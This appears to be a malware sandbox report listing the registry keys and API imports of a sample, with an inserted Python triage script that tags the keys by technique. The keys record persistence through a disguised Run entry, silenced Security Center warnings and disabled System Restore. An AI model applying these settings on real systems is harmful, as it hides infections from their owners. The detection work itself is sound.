C:\Python27\Lib\bsddb\dbutils.py
C:\Python27\Lib\bsddb\test\test_all.py
C:\Python27\Lib\bsddb\test\test_associate.py
C:\Python27\Lib\bsddb\test\test_basics.py
C:\Python27\Lib\bsddb\test\test_compare.py
C:\Python27\Lib\bsddb\test\test_compat.py
C:\Python27\Lib\bsddb\test\test_cursor_pget_bug.py
C:\Python27\Lib\bsddb\test\test_db.py
C:\Python27\Lib\bsddb\test\test_dbenv.py
C:\Python27\Lib\bsddb\test\test_dbobj.py
C:\Python27\Lib\bsddb\test\test_dbshelve.py
C:\Python27\Lib\bsddb\test\test_dbtables.py
C:\Python27\Lib\bsddb\test\test_distributed_transactions.py
C:\Python27\Lib\bsddb\test\test_early_close.py
C:\Python27\Lib\bsddb\test\test_fileid.py
C:\Python27\Lib\bsddb\test\test_get_none.py
C:\Python27\Lib\bsddb\test\test_join.py
C:\Python27\Lib\bsddb\test\test_lock.py
C:\Python27\Lib\bsddb\test\test_misc.py
C:\Python27\Lib\bsddb\test\test_pickle.py
C:\Python27\Lib\bsddb\test\test_queue.py
C:\Python27\Lib\bsddb\test\test_recno.py
C:\Python27\Lib\bsddb\test\test_replication.py
C:\Python27\Lib\bsddb\test\test_sequence.py
C:\Python27\Lib\bsddb\test\test_thread.py
C:\Python27\Lib\bsddb\__init__.py
C:\Python27\Lib\calendar.py
C:\Python27\Lib\calendar.pyc
C:\Python27\Lib\cgi.py
C:\Python27\Lib\CGIHTTPServer.py
C:\Python27\Lib\cgitb.py
C:\Python27\Lib\chunk.py
C:\Python27\Lib\cmd.py
C:\Python27\Lib\code.py
C:\Python27\Lib\code.pyc
C:\Python27\Lib\codecs.py
C:\Python27\Lib\codecs.pyc
C:\Python27\Lib\codecs.pyo
C:\Python27\Lib\codeop.py
C:\Python27\Lib\codeop.pyc
C:\Python27\Lib\collections.py
C:\Python27\Lib\collections.pyc
C:\Python27\Lib\colorsys.py
C:\Python27\Lib\commands.py
C:\Python27\Lib\compileall.py
C:\Python27\Lib\compiler\ast.py
C:\Python27\Lib\compiler\consts.py
C:\Python27\Lib\compiler\future.py
C:\Python27\Lib\compiler\misc.py
C:\Python27\Lib\compiler\pyassem.py
C:\Python27\Lib\compiler\pycodegen.py
C:\Python27\Lib\compiler\symbols.py
C:\Python27\Lib\compiler\syntax.py
C:\Python27\Lib\compiler\transformer.py
C:\Python27\Lib\compiler\visitor.py
C:\Python27\Lib\compiler\__init__.py
C:\Python27\Lib\ConfigParser.py
C:\Python27\Lib\ConfigParser.pyc
C:\Python27\Lib\contextlib.py
C:\Python27\Lib\Cookie.py
C:\Python27\Lib\cookielib.py
C:\Python27\Lib\copy.py
C:\Python27\Lib\copy.pyc
C:\Python27\Lib\copy_reg.py
C:\Python27\Lib\copy_reg.pyc
C:\Python27\Lib\copy_reg.pyo
C:\Python27\Lib\cProfile.py
C:\Python27\Lib\csv.py
C:\Python27\Lib\ctypes\macholib\dyld.py
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft Windows Services
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft Windows Services
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\GRE_Initialize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesOverride
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AutoUpdateDisableNotify
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore\
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\SystemRestore\DisableSR
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoProxyDetectType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASAPI32\EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASAPI32\FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASAPI32\EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASAPI32\ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASAPI32\MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASAPI32\FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASMANCS\EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASMANCS\FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASMANCS\EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASMANCS\ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASMANCS\MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASMANCS\FileDirectory
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\ProgramData
HKEY_USERS\S-1-5-21-120665959-548228820-2376508522-1001\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-120665959-548228820-2376508522-1001
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-120665959-548228820-2376508522-1001\ProfileImagePath
HKEY_CURRENT_USER\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings
HKEY_CURRENT_USER\Software\Microsoft\windows\CurrentVersion\Internet Settings\Wpad
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\WpadLastNetwork
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en-GB
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en-GB
HKEY_CURRENT_USER\Keyboard Layout\Preload
HKEY_CURRENT_USER\Keyboard Layout\Preload\1
HKEY_CURRENT_USER\Keyboard Layout\Preload\2
HKEY_CURRENT_USER\Keyboard Layout\Preload\3
HKEY_CURRENT_USER\Keyboard Layout\Preload\4
HKEY_CURRENT_USER\Keyboard Layout\Preload\5
HKEY_CURRENT_USER\Keyboard Layout\Preload\6
HKEY_CURRENT_USER\Keyboard Layout\Preload\7
HKEY_CURRENT_USER\Keyboard Layout\Preload\8
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Domain
HKEY_CURRENT_USER\Control Panel\International
HKEY_CURRENT_USER\Control Panel\International\LocaleName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\productName
HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString
HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier
HKEY_LOCAL_MACHINE\SOFTWARE\keys_data\data
HKEY_CURRENT_USER\SOFTWARE\keys_data\data
HKEY_LOCAL_MACHINE\SOFTWARE\ex_data\data
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\ex_data\data\ext
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\keys_data\data\public
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\keys_data\data\private
HKEY_CURRENT_USER
HKEY_CURRENT_USER\Network
HKEY_LOCAL_MACHINE\system\CurrentControlSet
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\control\NetworkProvider\HwOrder
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\NetworkProvider\HwOrder\ProviderOrder
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RDPNP\NetworkProvider
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RDPNP\NetworkProvider\name
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RDPNP\NetworkProvider\Class
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RDPNP\NetworkProvider\ProviderPath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\LanmanWorkstation\NetworkProvider
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\LanmanWorkstation\NetworkProvider\name
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\LanmanWorkstation\NetworkProvider\Class
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\LanmanWorkstation\NetworkProvider\ProviderPath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WebClient\NetworkProvider
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WebClient\NetworkProvider\name
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WebClient\NetworkProvider\Class
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WebClient\NetworkProvider\ProviderPath
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\Rpc
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanmanWorkstation\NetworkProvider
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\LanmanWorkstation\NetworkProvider\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesOverride
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AutoUpdateDisableNotify
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\SystemRestore\DisableSR
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoProxyDetectType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASAPI32\EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASAPI32\FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASAPI32\EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASAPI32\ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASAPI32\MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASAPI32\FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASMANCS\EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASMANCS\FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASMANCS\EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASMANCS\ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASMANCS\MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASMANCS\FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\ProgramData
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-120665959-548228820-2376508522-1001\ProfileImagePath
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en-GB
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en-GB
HKEY_CURRENT_USER\Keyboard Layout\Preload\1
HKEY_CURRENT_USER\Keyboard Layout\Preload\2
HKEY_CURRENT_USER\Keyboard Layout\Preload\3
HKEY_CURRENT_USER\Keyboard Layout\Preload\4
HKEY_CURRENT_USER\Keyboard Layout\Preload\5
HKEY_CURRENT_USER\Keyboard Layout\Preload\6
HKEY_CURRENT_USER\Keyboard Layout\Preload\7
HKEY_CURRENT_USER\Keyboard Layout\Preload\8
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Domain
HKEY_CURRENT_USER\Control Panel\International\LocaleName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\productName
HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString
HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\NetworkProvider\HwOrder\ProviderOrder
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RDPNP\NetworkProvider\name
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RDPNP\NetworkProvider\Class
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RDPNP\NetworkProvider\ProviderPath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\LanmanWorkstation\NetworkProvider\name
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\LanmanWorkstation\NetworkProvider\Class
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\LanmanWorkstation\NetworkProvider\ProviderPath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WebClient\NetworkProvider\name
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WebClient\NetworkProvider\Class
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WebClient\NetworkProvider\ProviderPath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\LanmanWorkstation\NetworkProvider\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft Windows Services
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft Windows Services
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesOverride
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AutoUpdateDisableNotify
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\SystemRestore\DisableSR
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\WpadLastNetwork
HKEY_LOCAL_MACHINE\SOFTWARE\ex_data\data
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\ex_data\data\ext
HKEY_LOCAL_MACHINE\SOFTWARE\keys_data\data
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\keys_data\data\public
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\keys_data\data\private
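The registry paths above are printed as bare key names, with no operation type and no value data, so triage has to start from what each key is for. The script below is an added example by the editor, not part of the sandbox output: it normalises the paths (hive aliases, the Wow6432Node redirection, ControlSet001) and tags them with a small rule set covering the Run key, the Security Center override and DisableNotify values, SystemRestore\DisableSR, the WinINet proxy and WPAD keys, the network-provider lookups and the non-Microsoft keys_data / ex_data keys seen in the list. The rule names, thresholds and rationale strings are the editor's choice, and the sample list is a subset copied from the report. A hit under "persistence" or "defense_evasion" only says the key was touched; whether it was written has to come from the API list that follows (RegSetValueExW, RegCreateKeyExA, RegDeleteTreeW) or from a registry diff.

```python
"""Triage of registry key paths as a sandbox report prints them (added example).

The report gives no operation type and no value data, so these rules say what a key
is *for*; confirm writes against RegSetValueExW / RegCreateKeyExA in the API list.
"""
import re
from collections import defaultdict

# (tag, regex applied to the normalised path, rationale). Tag names are the editor's.
RULES = [
    ("persistence.run_key",
     re.compile(r"\\microsoft\\windows\\currentversion\\run\\"),
     "Run key: a value here starts the image at every logon"),
    ("defense_evasion.security_center",
     re.compile(r"\\microsoft\\security center\\(antivirus|firewall|updates|autoupdate)(override|disablenotify)$"),
     "Security Center flags that silence AV / firewall / update warnings"),
    ("defense_evasion.system_restore",
     re.compile(r"\\systemrestore\\disablesr$"),
     "DisableSR: turns System Restore off"),
    ("defense_evasion.firewall_allowlist",
     re.compile(r"\\firewallpolicy\\standardprofile\\authorizedapplications\\list"),
     "Windows Firewall application allow-list"),
    ("defense_evasion.defender_policy",
     re.compile(r"\\policies\\microsoft\\windows defender"),
     "Windows Defender policy root"),
    ("discovery.proxy",
     re.compile(r"\\internet settings\\(connections|wpad|autoproxydetecttype)"),
     "WinINet proxy / WPAD settings, read before the first HTTP request"),
    ("discovery.host",
     re.compile(r"\\(centralprocessor\\0|windows nt\\currentversion\\productname|tcpip\\parameters\\domain)"),
     "CPU string, OS product name, DNS domain: a typical host fingerprint"),
    ("discovery.network_shares",
     re.compile(r"\\networkprovider\\"),
     "network provider order: precedes WNetOpenEnum share enumeration"),
    ("staging.custom_keys",
     re.compile(r"\\software\\(keys_data|ex_data)\\data"),
     "non-Microsoft keys (public / private / ext) holding the sample's own state"),
    ("noise.ras_tracing",
     re.compile(r"\\microsoft\\tracing\\"),
     "RAS tracing lookups: side effect of loading wininet/rasapi32, not sample logic"),
    ("noise.locale",
     re.compile(r"\\(keyboard layout\\preload|nls\\(customlocale|extendedlocale)|control panel\\international)"),
     "locale and keyboard-layout reads: CRT initialisation, but also a common geo-check"),
]


def normalise(key):
    """Lower-case, alias the hives and drop the 32-bit redirection so one rule covers both views."""
    k = key.lower()
    k = k.replace("hkey_local_machine", "hklm").replace("hkey_current_user", "hkcu")
    k = re.sub(r"^hkey_users\\s-1-5-21-[\d-]+", "hkcu", k)   # interactive user's hive == HKCU
    k = k.replace("\\wow6432node", "")                       # 32-bit view of the same key
    return k.replace("\\controlset001\\", "\\currentcontrolset\\")


def classify(keys):
    """Map every key to the first rule it matches; unmatched keys go under 'unclassified'."""
    hits = defaultdict(list)
    for key in keys:
        nk = normalise(key)
        for tag, pattern, _ in RULES:
            if pattern.search(nk):
                hits[tag].append(key)
                break
        else:
            hits["unclassified"].append(key)
    return dict(hits)


def report(keys):
    hits = classify(keys)
    out = []
    for tag, _, why in RULES:
        if tag in hits:
            out.append(f"[{tag}] {why}")
            out.extend(f"    {k}" for k in hits[tag])
    out.append(f"[unclassified] {len(hits.get('unclassified', []))} key(s)")
    return "\n".join(out)


# Subset of the key paths copied from the report above (constructed sample input).
SAMPLE_KEYS = [
    r"HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft Windows Services",
    r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft Windows Services",
    r"HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride",
    r"HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify",
    r"HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AutoUpdateDisableNotify",
    r"HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\SystemRestore\DisableSR",
    r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\WpadLastNetwork",
    r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings",
    r"HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString",
    r"HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Domain",
    r"HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\LanmanWorkstation\NetworkProvider\ProviderPath",
    r"HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\keys_data\data\public",
    r"HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\keys_data\data\private",
    r"HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\ex_data\data\ext",
    r"HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASAPI32\EnableFileTracing",
    r"HKEY_CURRENT_USER\Keyboard Layout\Preload\1",
    r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\ProgramData",
]

if __name__ == "__main__":
    print(report(SAMPLE_KEYS))
```

The two "noise" tags matter as much as the hits: the Tracing\winsvcs_RASAPI32 and Keyboard Layout reads look alarming in a flat list but are what any WinINet-using CRT binary produces, so a rule set that does not name them inflates the triage.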
kernel32.dll.FlsAlloc
kernel32.dll.FlsGetValue
kernel32.dll.FlsSetValue
kernel32.dll.FlsFree
kernel32.dll.CreateToolhelp32Snapshot
kernel32.dll.Module32FirstW
kernel32.dll.GlobalAlloc
kernel32.dll.LoadLibraryA
kernel32.dll.VirtualAlloc
kernel32.dll.VirtualProtect
kernel32.dll.VirtualFree
kernel32.dll.GetVersionExA
kernel32.dll.TerminateProcess
kernel32.dll.ExitProcess
kernel32.dll.SetErrorMode
msvcrt.dll._controlfp
msvcrt.dll._except_handler3
msvcrt.dll.__set_app_type
msvcrt.dll.__p__fmode
msvcrt.dll.memset
msvcrt.dll.__p__commode
msvcrt.dll._adjust_fdiv
msvcrt.dll.__setusermatherr
msvcrt.dll._initterm
msvcrt.dll.__getmainargs
msvcrt.dll._acmdln
msvcrt.dll.exit
msvcrt.dll._XcptFilter
msvcrt.dll._exit
msvcrt.dll._snprintf
msvcrt.dll.fclose
msvcrt.dll.fseek
msvcrt.dll.ftell
msvcrt.dll.srand
msvcrt.dll.rand
msvcrt.dll._wfopen
msvcrt.dll._snwprintf
wininet.dll.HttpQueryInfoA
wininet.dll.InternetCloseHandle
wininet.dll.InternetReadFile
wininet.dll.InternetOpenUrlW
wininet.dll.InternetOpenW
wininet.dll.InternetOpenUrlA
wininet.dll.InternetOpenA
urlmon.dll.URLDownloadToFileW
shlwapi.dll.PathFindFileNameW
shlwapi.dll.PathFindFileNameA
shlwapi.dll.PathFileExistsW
kernel32.dll.ExitThread
kernel32.dll.CreateFileW
kernel32.dll.GetModuleFileNameW
kernel32.dll.Sleep
kernel32.dll.WriteFile
kernel32.dll.GetTickCount
kernel32.dll.CloseHandle
kernel32.dll.GetLastError
kernel32.dll.CreateMutexA
kernel32.dll.SetFileAttributesW
kernel32.dll.CreateThread
kernel32.dll.GetModuleHandleA
kernel32.dll.GetStartupInfoA
kernel32.dll.DeleteFileW
kernel32.dll.ExpandEnvironmentStringsW
kernel32.dll.CreateProcessW
kernel32.dll.CreateDirectoryW
kernel32.dll.CopyFileW
advapi32.dll.RegSetValueExW
advapi32.dll.RegCloseKey
advapi32.dll.RegOpenKeyExW
advapi32.dll.RegCreateKeyExA
advapi32.dll.RegQueryValueExW
shell32.dll.ShellExecuteW
rasapi32.dll.RasConnectionNotificationW
sechost.dll.NotifyServiceStatusChangeA
cryptbase.dll.SystemFunction036
ole32.dll.CoInitializeEx
advapi32.dll.RegDeleteTreeA
advapi32.dll.RegDeleteTreeW
ole32.dll.CoCreateInstance
iphlpapi.dll.GetAdaptersAddresses
dhcpcsvc.dll.DhcpRequestParams
ole32.dll.CoUninitialize
oleaut32.dll.#500
kernel32.dll.SortGetHandle
kernel32.dll.SortCloseHandle
msvcrt.dll.isalpha
msvcrt.dll.wcsstr
msvcrt.dll.isdigit
msvcrt.dll.memcpy
kernel32.dll.GetFileAttributesW
kernel32.dll.GetLogicalDriveStringsW
kernel32.dll.GetDriveTypeW
kernel32.dll.FindFirstFileW
kernel32.dll.FindClose
kernel32.dll.GlobalUnlock
kernel32.dll.GlobalLock
kernel32.dll.FindNextFileW
kernel32.dll.GetVolumeInformationW
user32.dll.OpenClipboard
user32.dll.EmptyClipboard
user32.dll.GetClipboardData
user32.dll.CloseClipboard
user32.dll.SetClipboardData
ole32.dll.CoInitialize
kernel32.dll.OpenMutexW
kernel32.dll.GetSystemInfo
kernel32.dll.WaitForMultipleObjects
kernel32.dll.lstrcmpiW
kernel32.dll.GetUserDefaultUILanguage
kernel32.dll.DeleteCriticalSection
kernel32.dll.GetShortPathNameW
kernel32.dll.GetWindowsDirectoryW
kernel32.dll.lstrcpyA
kernel32.dll.lstrcmpiA
kernel32.dll.Process32FirstW
kernel32.dll.Process32NextW
kernel32.dll.LeaveCriticalSection
kernel32.dll.EnterCriticalSection
kernel32.dll.VirtualLock
kernel32.dll.MoveFileExW
kernel32.dll.FindFirstFileExW
kernel32.dll.WideCharToMultiByte
kernel32.dll.lstrcmpW
kernel32.dll.GetSystemTime
kernel32.dll.GetNativeSystemInfo
kernel32.dll.GetDiskFreeSpaceW
kernel32.dll.VirtualUnlock
kernel32.dll.VerSetConditionMask
kernel32.dll.VerifyVersionInfoW
kernel32.dll.SetLastError
kernel32.dll.LocalAlloc
kernel32.dll.LocalFree
kernel32.dll.MulDiv
kernel32.dll.GetTempPathW
kernel32.dll.GlobalFree
kernel32.dll.ConnectNamedPipe
kernel32.dll.CreateNamedPipeW
kernel32.dll.CreateEventW
kernel32.dll.GetCurrentProcessId
kernel32.dll.GetFullPathNameW
kernel32.dll.SetStdHandle
kernel32.dll.GetConsoleMode
kernel32.dll.GetConsoleCP
kernel32.dll.FlushFileBuffers
kernel32.dll.OutputDebugStringW
kernel32.dll.HeapAlloc
kernel32.dll.RtlUnwind
kernel32.dll.OpenProcess
kernel32.dll.InitializeCriticalSection
kernel32.dll.GetDriveTypeA
kernel32.dll.GetCommandLineA
kernel32.dll.GetProcessHeap
kernel32.dll.GetComputerNameW
kernel32.dll.WaitForSingleObject
kernel32.dll.GetSystemDefaultUILanguage
